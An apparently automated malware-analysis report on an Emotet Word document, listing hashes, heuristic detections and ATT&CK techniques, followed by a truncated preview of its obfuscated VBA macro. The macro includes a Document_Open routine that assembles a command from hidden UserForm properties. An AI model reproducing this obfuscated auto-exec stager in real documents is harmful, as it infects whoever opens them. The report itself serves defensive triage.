Emotet Office (OLE) malware analysis — malicious · b45a65072e2ff22b

MALICIOUS

Office (OLE)

200.9 KB Created: 2019-12-18 16:47:00 Authoring application: Microsoft Office Word First seen: 2020-02-04

MD5: 359ce657f31239321ff89c623cb8c691 SHA-1: 40e084436dc351d8a5843bd405925515d661e6c2 SHA-256: b45a65072e2ff22b6d0b44be7134d0f68cde2d872106ceb04089cd2735dc53eb

262 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The sample contains VBA macros, specifically a Document_Open macro that utilizes CreateObject and a hidden UserForm property to execute a command stager. ClamAV identifies this as Doc.Downloader.Emotet-7464570-0, strongly suggesting the Emotet family. The macro's primary function appears to be downloading and executing a second-stage payload.

Heuristics 7

ClamAV: Doc.Downloader.Emotet-7464570-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-7464570-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER

VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11189 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	11189 bytes
SHA-256: `7d6b095b4dc46cfa520e93bab140334ee73eed756d3f75e02ffea0d469ad14c6`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Ktbzpwygnmjl" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Control = "Sxdahqhm, 0, 0, MSForms, TextBox" Private Sub Document_open() Vqkkqkdeedz = Sitdhosekwdb Wkurgvkyexd = 157 Cmtdxgvvzv = ("Omnis nisi enim rerum.") Sklluhjxuh = (528) Dim Ltrjtevazf As Integer Dim Qsfuxuwpohnl As Double Dim Jqtlouskreo As Integer Dim Uzflnutv As Boolean Dim Ozakeveg As String Dim Fufgnqvzga As Integer Dim Lscpivaqf As String Oflojoony = (191) Dim Wauzxwyu As String Ainhiomj = ("Temporibus eos eum.") Fnmqbccmkrn = (650) Dim Jvbujxdskdhow As Double Bzcdsswio = Vumjxnxkdmgtc Xukecedv = Ojkfmnnqlb Afuqluuuf = "Eveniet dolor deserunt ad voluptatibus." Qucxjcssybyi = 958 Mknkfqopifhnc = Nnbxkclmrfasu Qayiterwf = 925 Noyqfxxwwpbl = ("Assumenda asperiores.") Byweeyticogo = (419) Dim Rwqwsqpwnaacv As Integer Dim Qopwnsfura As Boolean Dim Emjkqdzf As Boolean Dim Ftmeflvebdvxm As Boolean Dim Sgfmbyvlqlje As Boolean Dim Zvsksjwjjn As Integer Dim Nzdegajsxxtty As Boolean Hwtvhftchc = (196) Dim Qvixsrckwhle As String Xmcbzmsaonpr = ("Mabel") Uxwbtgtwoabb = (367) Dim Nzkplmhgafd As Boolean Qhvhaejq = Kkdbaycayr Odagalnxqyt = Ptsaxmxn Ehlhixef = "Occaecati iusto a." Csrgudxdbulqz = 1 Fvvjkviqpi = Lwnhqlzdgll Cexeaiqwjctp = 603 Tyzmzbuvrthgt = ("Deleniti explicabo voluptatem qui.") Etkxrirlmoajt = (41) Dim Trlpgegzlwxg As Integer Dim Xtpdzfij As Boolean Dim Ocnnxzrauxz As Double Dim Egtxuzatbeho As Boolean Dim Fuwlkzybeq As Boolean Dim Mexmpehy As Integer Dim Fhojrtmxgycom As Integer Lpqwdbcetmwvp = (791) Dim Hwahpoxa As String Ogkuyysrn = ("Sapiente vero sed reprehenderit.") Qchvcdvxvxw = (784) Dim Qgneqkoo As Integer Ovsjuoddbko = Tmmkbdmhrxhe Nbdqahlsak = Jruuzpam Ezmkxjwxlfbc = "Alias." Ytnjialc = 504 Iobmoqajahxs End Sub Attribute VB_Name = "Vjgdknlt" Attribute VB_Base = "0{5198C26E-EC35-48EC-B747-FBA047B9C264}{92B413BD-2514-4BCC-8A09-93C1A9E7EDC6}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Nmgafsqbbgpfo" Function Xnfdptigz() Khwraequogtos = Swljvmnpphxkf Cuvlyrbmv = 777 Ewydnidjjb = ("Non.") Ekxrgkctlc = (727) Dim Zsgpgqjq As Double Dim Irrmtphwjf As Double Dim Qabavctwac As Boolean Dim Dvbncsrdqucf As Boolean Dim Qnmpsbvpbgof As Double Dim Xwkgcwiyn As Double Dim Qoetwyvzblfk As Double Myotvywxjg = (126) Dim Wcdlrztvcn As Boolean Fitgtwrmzwqy = ("Vel illo repellat ut.") Suwtfxzmb = (833) Dim Qtgrphzhtnnfq As String Pilzmfrmgyz = Twtgajcck Pqqarfpfos = Abgqzhzsqyr Ugehckembkvoq = "Enim nam modi qui." Jttqlfse = 423 Zseadboojgk = Ktbzpwygnmjl.Sxdahqhm Cysuqjobxd = Slixnadfz Pzhbpubzwqhu = 605 Evlixnknb = ("Placeat quis.") Prcujrlsf = (725) Dim Jhzhveirkqvr As Double Dim Swbwibxfv As Boolean Dim Zfmywchc As Double Dim Ejqsffkqpu As String Dim Oqujvxbydlze As String Dim Vsonnpztonkec As Boolean Dim Pgfdgqwdmg As String Lisjmwgj = (11) Dim Cgkuvchz As Boolean Elofubpizocg = ("Quia consequatur debitis.") Okwdxhvnumd = (406) Dim Lvtwmpowzunp As String Yjdavdvgk = Bjzqqbbvh Fsproroqinm = Drmivxfknrlfp Sltddkdkle = "Enim vel." Rtxrpjcnz = 908 Onemonoegwjl = Zseadboojgk + Vjgdknlt.Spzrnfjqi + Vjgdknlt.Gwdnlcihm + Vjgdknlt.Hhzbdrrf Eabwvkjadca = Vxrujavv Sgrkxreo = 826 Hzznukcn = ("Ipsum voluptatem et.") Pyluvfyqoe = (873) Dim Czipdaljzonm As String Dim Ydzzxhdtluvx As Integer Dim Snzihpxaffgb As Double Dim Jalyaahvrp As Integer Dim Ojnougmsqlo As String Dim Exyxusvft As Integer Dim Iwwolxwkbt As Integer Mrkapksxlht = (631) Dim Jxwxliuz As Double Xjxhtpedk = ("Woodrow") Lgjsfvamzb = (151) Dim Mczznplf As Integer Mmqsczhgdi = Xqnfgnunddui Tqrnzyvbu = Nsbesxui Ilhjxlbgi = "Culpa ratione." Hygqpp ... (truncated)

SHA-256: 7d6b095b4dc46cfa520e93bab140334ee73eed756d3f75e02ffea0d469ad14c6

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Ktbzpwygnmjl"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Sxdahqhm, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   Vqkkqkdeedz = Sitdhosekwdb
Wkurgvkyexd = 157
Cmtdxgvvzv = ("Omnis nisi enim rerum.")
Sklluhjxuh = (528)
Dim Ltrjtevazf As Integer
Dim Qsfuxuwpohnl As Double
Dim Jqtlouskreo As Integer
Dim Uzflnutv As Boolean
Dim Ozakeveg As String
Dim Fufgnqvzga As Integer
Dim Lscpivaqf As String
Oflojoony = (191)
Dim Wauzxwyu As String
Ainhiomj = ("Temporibus eos eum.")
Fnmqbccmkrn = (650)
Dim Jvbujxdskdhow As Double
Bzcdsswio = Vumjxnxkdmgtc
Xukecedv = Ojkfmnnqlb
Afuqluuuf = "Eveniet dolor deserunt ad voluptatibus."
Qucxjcssybyi = 958
   Mknkfqopifhnc = Nnbxkclmrfasu
Qayiterwf = 925
Noyqfxxwwpbl = ("Assumenda asperiores.")
Byweeyticogo = (419)
Dim Rwqwsqpwnaacv As Integer
Dim Qopwnsfura As Boolean
Dim Emjkqdzf As Boolean
Dim Ftmeflvebdvxm As Boolean
Dim Sgfmbyvlqlje As Boolean
Dim Zvsksjwjjn As Integer
Dim Nzdegajsxxtty As Boolean
Hwtvhftchc = (196)
Dim Qvixsrckwhle As String
Xmcbzmsaonpr = ("Mabel")
Uxwbtgtwoabb = (367)
Dim Nzkplmhgafd As Boolean
Qhvhaejq = Kkdbaycayr
Odagalnxqyt = Ptsaxmxn
Ehlhixef = "Occaecati iusto a."
Csrgudxdbulqz = 1
   Fvvjkviqpi = Lwnhqlzdgll
Cexeaiqwjctp = 603
Tyzmzbuvrthgt = ("Deleniti explicabo voluptatem qui.")
Etkxrirlmoajt = (41)
Dim Trlpgegzlwxg As Integer
Dim Xtpdzfij As Boolean
Dim Ocnnxzrauxz As Double
Dim Egtxuzatbeho As Boolean
Dim Fuwlkzybeq As Boolean
Dim Mexmpehy As Integer
Dim Fhojrtmxgycom As Integer
Lpqwdbcetmwvp = (791)
Dim Hwahpoxa As String
Ogkuyysrn = ("Sapiente vero sed reprehenderit.")
Qchvcdvxvxw = (784)
Dim Qgneqkoo As Integer
Ovsjuoddbko = Tmmkbdmhrxhe
Nbdqahlsak = Jruuzpam
Ezmkxjwxlfbc = "Alias."
Ytnjialc = 504
Iobmoqajahxs
End Sub

Attribute VB_Name = "Vjgdknlt"
Attribute VB_Base = "0{5198C26E-EC35-48EC-B747-FBA047B9C264}{92B413BD-2514-4BCC-8A09-93C1A9E7EDC6}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Nmgafsqbbgpfo"
Function Xnfdptigz()
   Khwraequogtos = Swljvmnpphxkf
Cuvlyrbmv = 777
Ewydnidjjb = ("Non.")
Ekxrgkctlc = (727)
Dim Zsgpgqjq As Double
Dim Irrmtphwjf As Double
Dim Qabavctwac As Boolean
Dim Dvbncsrdqucf As Boolean
Dim Qnmpsbvpbgof As Double
Dim Xwkgcwiyn As Double
Dim Qoetwyvzblfk As Double
Myotvywxjg = (126)
Dim Wcdlrztvcn As Boolean
Fitgtwrmzwqy = ("Vel illo repellat ut.")
Suwtfxzmb = (833)
Dim Qtgrphzhtnnfq As String
Pilzmfrmgyz = Twtgajcck
Pqqarfpfos = Abgqzhzsqyr
Ugehckembkvoq = "Enim nam modi qui."
Jttqlfse = 423
Zseadboojgk = Ktbzpwygnmjl.Sxdahqhm
   Cysuqjobxd = Slixnadfz
Pzhbpubzwqhu = 605
Evlixnknb = ("Placeat quis.")
Prcujrlsf = (725)
Dim Jhzhveirkqvr As Double
Dim Swbwibxfv As Boolean
Dim Zfmywchc As Double
Dim Ejqsffkqpu As String
Dim Oqujvxbydlze As String
Dim Vsonnpztonkec As Boolean
Dim Pgfdgqwdmg As String
Lisjmwgj = (11)
Dim Cgkuvchz As Boolean
Elofubpizocg = ("Quia consequatur debitis.")
Okwdxhvnumd = (406)
Dim Lvtwmpowzunp As String
Yjdavdvgk = Bjzqqbbvh
Fsproroqinm = Drmivxfknrlfp
Sltddkdkle = "Enim vel."
Rtxrpjcnz = 908
Onemonoegwjl = Zseadboojgk + Vjgdknlt.Spzrnfjqi + Vjgdknlt.Gwdnlcihm + Vjgdknlt.Hhzbdrrf
   Eabwvkjadca = Vxrujavv
Sgrkxreo = 826
Hzznukcn = ("Ipsum voluptatem et.")
Pyluvfyqoe = (873)
Dim Czipdaljzonm As String
Dim Ydzzxhdtluvx As Integer
Dim Snzihpxaffgb As Double
Dim Jalyaahvrp As Integer
Dim Ojnougmsqlo As String
Dim Exyxusvft As Integer
Dim Iwwolxwkbt As Integer
Mrkapksxlht = (631)
Dim Jxwxliuz As Double
Xjxhtpedk = ("Woodrow")
Lgjsfvamzb = (151)
Dim Mczznplf As Integer
Mmqsczhgdi = Xqnfgnunddui
Tqrnzyvbu = Nsbesxui
Ilhjxlbgi = "Culpa ratione."
Hygqpp
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.